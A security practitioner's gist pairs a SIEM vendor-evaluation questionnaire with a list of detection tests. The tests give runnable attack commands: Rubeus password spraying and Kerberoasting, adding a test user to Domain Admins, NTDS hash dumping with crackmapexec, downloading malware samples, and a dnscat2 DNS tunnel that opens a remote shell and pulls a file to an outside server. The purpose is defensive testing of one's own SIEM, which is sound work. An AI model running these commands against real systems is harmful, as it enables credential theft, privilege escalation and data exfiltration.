Skip to content

Instantly share code, notes, and snippets.

@7MinSec
Last active March 18, 2024 12:43
Show Gist options
  • Star 10 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
  • Save 7MinSec/edf91f87ee95b48c803895614a0ec57a to your computer and use it in GitHub Desktop.
Save 7MinSec/edf91f87ee95b48c803895614a0ec57a to your computer and use it in GitHub Desktop.
Some simple security tests you can run to test the effectiveness of your SIEM

Introduction

In episode 338 of the 7 Minute Security podcast, I talked about a recent engagement where I helped a customer do a bit of a SIEM solution bake-off. This gist is the companion to that episode, and is broken down into the following two sections:

  • Questionnaire - a series of questions you can ask SIEM vendors to gather as many data points about their products and services as possible

  • SIEM tests - a few tests you can conduct on your internal/external network to see if your SIEM solution indeed coughs up alerts on some things it should indeed whine about

Questionnaire

Introduction / Purpose

CustomerX desires to implement a SIEM solution to protect endpoints within their LAN in SomeCity, SomeState and their self-hosted datacenter (provided by SomeCompany in SomeState).

This questionnaire is designed to help prime the conversation CustomerX wants to have with each vendor, so that when each vendor comes in to discuss and present their solution, CustomerX can gather the same set of criteria from each one, and make the most well-informed purchase decision possible.

Expectations

It is not expected that the vendor prepare a written response to this questionnaire ahead of time (though that is an option), but it is expected that the vendor be ready to answer these questions when meeting with CustomerX.

Questions

The document is broken into several high level topics, with appropriate sub-topics and questions nested within each one.

Demo / trial period

Do you provide a demo or trial period of your product?

  • If yes, how long?

  • Any limitations during the trial period (i.e. number of alerts, functionality, etc.)?

  • Are there any costs associated with a trial period / demo unit?

Sensor deployment

  • With CustomerX's environment in mind (a network diagram will be provided), what will be the ideal sensor deployment configuration?

  • And what are the options for log flow (i.e. does it make sense to have one sensor per LAN, or could devices at the datacenter push their logs to a single sensor located at CustomerX's home office)?

  • What form can the sensors be in (physical/virtual/both)?

  • Traditionally, SIEMs need a lot of ongoing tuning to be effective, so how much of that will be done on the vendor side vs. CustomerX's responsibility?

  • Does the sensor provide any IDS/IPS functionality?

  • Is the sensor interface Web-based or provide console access (or both)?

Endpoint configuration

  • Do you provide an agent or agentless configuration (or both)?

  • What operating systems, software and devices can you interpret logs from (include cloud services like O365, Google Apps, etc)?

  • Conversely, which can you not?

  • What would be the recommended logging configuration for CustomerX - just key servers or "everything" (including workstations)?

Log ingest

  • What are the various ways the sensors can gather network/endpoint logs and traffic?

  • Are there any limits to the log ingest of your solution?

  • Are the logs stored locally on the sensor(s), in the cloud, or both?

  • How long are logs kept?

  • What costs (if any) are generated to store logs longer than the default time?

  • What log searching capabilities will we have to find information from past events and alerts?

  • Will that searching require any additional software/hardware?

  • Can we cleanly export that data, if necessary, into an easy-to-read format like .CSV or .PDF?

Customization

  • Is the overall look/feel of your solution's interface customizable?

  • Is there extra cost associated to build functionality/dashboard/etc. that is not standard?

  • Will it be possible to create custom alerts?

  • Is there an extra cost associated with doing so?

  • Can we create custom reports?

  • Is there an extra cost associated with doing so?

Benefits

  • Provide some examples of your solution being able to detect/alert/stop common threats. Examples:

  • Email phishing attempts

  • Malware outbreaks

  • Hacker lateral movement

  • Data exfiltration

  • Provide examples of where your solution's ability to detect/alert/stop threats needs improvement?

  • How will this solution help improve our security posture?

  • How will this solution save us money?

Other features

  • Does your solution provide any vulnerability scanning functionality for the internal or external network?

  • How can your solution help me find systems that aren't currently being logged but probably should (i.e. the IT group spins up a new Windows server but forgot to tell anyone)?

  • Are you utilizing threat feeds to make decisions on what justifies an alert? If so are those public sources or proprietary (or both)?

Support

  • Will you provide engineering resources to install the sensors?

  • And if so, is that an extra cost?

  • Is any training available so our staff can get up to speed on using this solution?

  • What are the associated costs, if any?

  • What day-to-day support options are available if we need help (phone/email/etc.)?

  • What do the various support options cost?

  • What are support hours?

  • Will an SLA be signed as part of this?

  • What compensation will we receive if SLA is not met?

  • Will you help us install this? Do you provide support in deploying the necessary hardware/software to get the sensors up and running?

  • How often do you push updates/fixes/releases - and who installs them?

  • What features did you add to your last major release?

  • What feature of your product is lacking in functionality and may require development?

Costs / licensing

  • How is the monthly cost of this solution calculated (number of endpoints monitored, amount of log ingest, etc.)?

  • What "gotchas" (if any) exist that might cause us to incur more costs?

  • How can you help justify your product to our board in terms of ROI?


SIEM Tests

Finding easy ways to test your own SIEM is a passion project of 7 Minute Security's! In one of our YouTube videos and conference talks, we discussed 7 specific tests you can do to test your SIEM's might!

1. Port scanning (MITRE T1046)

  • Option 1 - a basic scan with nmap
nmap x.x.x.x/24
  • Option 2 - turn the scan "up to 11" with massscan
suo apt-get --assume-yes install git make gcc
sudo apt-get https://github.com/robertdavidgraham/masscan.git /opt/massscan
cd /opt/massscan
make
sudo make install
sudo massscan -p1-65535,U:1-65535 --rate=1000 x.x.x.x/24 -v

2. Password spraying (MITRE T1110/003)

Grab a copy of Rubeus and then run:

rubeus.exe spray /password:PASSWORD-YOU-WANNA-SPRAY /outfile:credz.txt

Rubeus will spray every active account once with the password you specify, and then save any valid credentials to credz.txt.

3. Kerberoasting (MITRE T1558/003)

Grab a copy of Rubeus and then run:

rubeus.exe kerberoast /simple

Rubeus will spit out the Kerberoastable users and their (potentially) crackable passwords.

4. ASREPRoasting (MITRE T1558/004)

Grab a copy of Rubeus and then run:

rubeus.exe asreproast

Rubeus will spit out the ASREPRoastable users and their (potentially) crackable passwords.

5. Key group membership changes (MITRE T1098)

Create a test user in Active Directory and then add it to one or more privileged groups:

net group "Administrators" testuser /add /domain
net group "Domain Admins" testuser /add /domain
net group "Enterprise Admins" testuser /add /domain
net group "Schema Admins" testuser /add /domain

6. Active Directory hash dumping (MITRE T1003/003)

Download CrackMapExec and, using a domain administrator account, run:

crackmapexec smb IP.OF.DOMAIN.CONTROLLER -u domainadmin -p YOURPASSWORD --ntds

If you want to do an Active Directory backup "the Microsoft way," fire up an elevated command prompt and do:

ntdsutil "ac i ntds" "ifm" "create full c:\backup-folder" q q

Pro tip: if you decide to use secretsdump for this hash-dumping operation, be careful in that sometimes it can cause a domain controller to crash.

7. SMB share enumeration (MITRE T1021/002)

Download PowerHuntShares and conduct the SMB enumeration like so:

Invoke-HuntSMBShares -Threads 100 -OutputDirectory c:\some\folder\you\want\to\dump\results\to

Additional misc tests

This is a series of tests I conducted to test the effectiveness of some SIEM solutions I was evaluating for a customer. I kept a detailed log of each test done, the URLs involved, the source and destination IPs, and timestamps for everything. That way the vendor has all the info they need to go through the logs and investigate issues if necessary.

Note: before doing these tests I highly recommend you spin up a fresh Kali or Windows VM, get it fully patched and snapshot it. That way we're being extra safe in case you jack up the machine as part of these tests.

Internal scans

Although some SIEMs ignore nmap scans, it doesn't hurt to fire one off anyway. Drop to a Terminal and do something like:

nmap -Pn 192.168.0.0/24 -oA internal-scan

Obviously replace 192.168.0.0/24 with your network. The -oA will output your scan into xml, nmap and grepable nmap format (cuz' why not?) that you can have on hand if your vendor wants to look at it.

External scan

Do a similar scan to some external IPs you own - like your home router IP or AWS/DO droplets that you operate.

Phishing

Head to Phish Tank and look through the recent submissions, as well as ones that have been around for a few days. Take a few that are offered in http and then fire them up and submit bogus usernames/passwords/account info/etc.

Virus downloads

Get an account at VirusBay and download a dozen or so samples. I usually take 6 "fresh" ones, and 6 that have been around for 3+ days.

To give the SIEM a bit more of a fighting chance, I also upload these samples to a Digital Ocean droplet and re-download them over HTTP. You can do that pretty easily by SFTPing all those samples to a folder like /icky on your droplet, then cd to that directory and do:

python3 -m http.server

Then you can just hit http://the-ip.of.your.droplet and grab all the samples.

DNS tunneling

To simulate DNS tunneling, you'll need both a server and a client.

Server setup

I like to just use a basic Linux DO droplet for this. Grab a copy of dnscat2 and extract it to a folder like /dnscat. Then start the server with:

ruby ./dnscat2.rb server=YOUR.DROPLET.IP.ADDRESS,port=53 --security=open

Note: whenever I set this up on a fresh Ubuntu box I forget to read the instructions which tell you to do:

git clone https://github.com/iagox86/dnscat2.git
cd dnscat2/server/
gem install bundler
bundle install

This always seems to fail for me, and I find that I'm missing one or more pre-requisites:

apt-get install build-essential
apt-get install ruby
sudo apt-get install ruby-dev

Additionally, once I go and fire up the dnscat server, sometimes systemd-resolved is hogging port 53 and won't let the server start, so I nuke it with this and try again:

sudo systemctl stop systemd-resolved

If I wanna get real fancy I script the whole thing:

sudo systemctl stop systemd-resolved
pause
sudo ruby ./dnscat2.rb server=IP.OF.MY.SERVER,port=53 --security=open

The output you'll see will tell you to run a command like this from the client (copy this for later)

/dnscat --dns server=x.x.x.x,port=53 --secret=1234567890987654321
Client setup

Again, grab dnscat2 and stick it somewhere like /dnscat.

Then, from that directory, type make

Now, create a test file or two to actually exfiltrate over DNS (the data will be just random garbage). For instance, to create a garbage file of 1mb:

dd if=/dev/zero of=1mb.txt count=1024 bs=1024

And now, on your Linux client, run this to connect to the dnscat2 server:

/dnscat --dns server=YOUR.DROPLET.IP.ADDRESS

If it's a Windows client, do:

dnscat2-exe --host YOUR.DROPLET.IP.ADDRESS

Now back on the server, you should get some message saying a shell has connected. To interact with it and download your garbage file, first connect to the new session:

session -i (plus the session number, which is probably 1)

Now drop to a shell:

Shell

You'll see some notification that a new session (probably 2) has been spawned. Connect to the new session:

session -i (plus the new session number, which is probably 2)

Do a dir or ls to validate you're receiving directory listings:

ls or dir

Back up so you can connect back to the original session:

Ctrl+Z

Connect to the original session:

session -i (plus original session number, which is probably 1)

Finally, download your 1mb.txt file:

download 1mb.txt /tmp/1mb.txt

Optionally, you can ensure the transfer is happening by opening a new Terminal window and watching with tcpdump:

tcpdump port 53

Have fun!

Note: This simple DNS test is my favorite, and in my opinion, vendors should absolutely pick up on this. I had one vendor tell me "Well, we didn't know what the DNS baseline looked like yet, so we didn't alert on it." My argument was, "I don't think that a single host should be making hundreds of thousands of DNS requests to a single IP, right?"

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment